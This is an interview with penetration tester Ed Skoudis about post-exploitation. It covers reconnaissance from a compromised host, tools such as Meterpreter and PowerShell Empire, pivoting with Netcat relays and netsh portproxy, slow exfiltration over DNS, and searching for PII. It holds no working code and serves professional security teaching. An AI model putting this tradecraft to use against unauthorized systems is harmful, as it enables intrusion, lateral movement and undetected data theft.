We’re very excited to present this Q&A with Ed Skoudis. Skoudis is a very large presence in the security world. Here’s just a snippet from his lengthy bio: founder of Counter Hack, sought-after instructor at the SANS Institute, creator of NetWars CyberCity, and winner of the US Army’s Order of Thor Medal.
We focused our questions on some of the essentials of post-exploitation techniques. Skoudis set us straight on definitions and methodologies. His answers also nicely complement our own series on pen–testing basics.
Inside Out Security: Let’s say you’ve entered a target system and installed an APT or RAT …
Ed Skoudis: I’m not sure APT is the proper word here. One doesn’t install an “APT”. An APT is a threat actor, specifically a very skilled one. [See this definition of APT.]
Also, I’d prefer not to install a RAT during a penetration test. There is no need for one in modern pen testing. RATs tend to be too heavyweight and intrusive. Traditional RATs usually provide GUI control of the machine and a bunch of splashy doodads that aren’t required by a penetration tester.
Instead, when compromising a machine, I like to use a light-weight payload, such as a Metasploit Meterpreter or related tool to get some form of shell access.
IOS: Ok, so after you’re in what would be the next four or five steps you’d take?
ES: After gaining a toe-hold on the target machine, I would:
- Determine the privileges I’m running with.
- Determine the machine’s location on the network and its network configuration, including looking at its network interfaces (it might be dual-homed), hostname, IP address, MAC address, ARP cache, and DNS cache. It’s important to look for both IPv4 and IPv6 information from these sources, as many systems support IPv6 in addition to IPv4, and IPv6 tends not to get as much scrutiny from security tools as IPv4, making it a nice avenue of attack.
- Look for the active TCP connections this machine has with other systems, especially interesting protocols such as SMB (for Windows file sharing and domain authentication) or SSH (for secure remote shell).
- Check to see what security tools are installed, including anti-virus, application white listing, local firewall, etc.
- See if I can leverage its location on the network and active TCP connections to pivot to another host.
IOS: What are some must-have tools for post-exploitation?
ES: For Windows targets, there are plentiful PowerShell tools for privilege escalation, pillaging, and pivoting. One of the very best suite of these tools is PowerShell Empire, which rolls together some incredible functionality from a variety of other projects.
In addition to PowerShell Empire, Metasploit itself includes dozens of post-exploitation modules useful for dumping hashes, grabbing crypto keys, getting environment information (including security defenses), and much more.
IOS: What are some techniques and tools for working out local network topology?
ES: I prefer to gain as much information from a compromised machine about the network around it as I can before resorting to intrusive (and easily discovered) scanning. That’s why I like to grab ARP cache, DNS cache, and a list of active TCP connections before moving on. That information tells me about other hosts that the currently compromised one knows about. I’ll also grab the routing table, as it may indicate additional routers on the subnet.
After pillaging that local information from a system, I then start probing to look for other targets on the same subnet, as they will likely be more accessible than systems on separate networks. A ping sweep (IPv4) or a ping of a multi-cast address (IPv6) may turn up additional nearby hosts ripe for picking and which may have identical credentials to the system(s) I’ve currently compromised!
I then typically do small-scale port scans of very interesting ports to me, those associated with protocols where I may find more juicy attack surface, including TCP 21, 22, 23, 25, 80, 443, 445, 6000, and more.
IOS: How do you go about moving around the network?
ES: I use a variety of methods for lateral movement, including the pivoting features of Meterpreter’s msfconsole route command and portfwd commands are quite useful.
On systems where Netcat is already installed (most Linuxes), I rely on Netcat relays of various types, including listener-to-client relays, but also client-to-client and listener-to-listener relays.
On Windows targets, I really love the “netsh interface portproxy” feature to forward ports through the machine, especially its ability to listen on a given port on IPv4 and then shoot data out to another port using IPv6. As far as TCP is concerned at Layer 4, it’s a single connection. But, we switch out the underlying Layer 3 protocol (from IPv4 to IPv6) underneath a single TCP connection. It’s beautiful.
IOS: What are the some of the ways exfiltration of data can be accomplished without it being detected?
ES: First, encryption. In many organizations, simply sending the data across a TLS connection will get the job done. Still, they may see the large transfer. If I need to be more subtle, I’ll consider moving data across a command-and-control channel over DNS or related protocol. A slow dribble is far less likely to be detected than a smash-and-grab, but will still demonstrate the business risk a professional pen tester is hired to show.
IOS: How does one search for PII and other sensitive content?
ES: Understanding the business use of a compromised machine is a vital step here. What does the machine do, and where does it store its information to do that? This usually gets me in the right direction.
I search using typical file system commands, such as cd, ls, find, grep, and so forth on Linux, and cd, dir, findstr, etc. on Windows. In PowerShell on Windows, we have some additional great features for searching through the file system.
There are specific tools for finding things like social security numbers and credit cards on targets, but I find that they tend to produce a lot of disk access and noise in the target environment, another items that may get a pen tester noticed and perhaps even blocked.
IOS: Finally, any recent trends you can comment on?
ES: Yes, attacks using PowerShell are really on the rise, and there are some tremendous tools like PowerShell Empire for modeling such attacks in pen tests. Furthermore, attacks against Windows Kerberos are an increasing vector today.
IOS: Thanks Ed!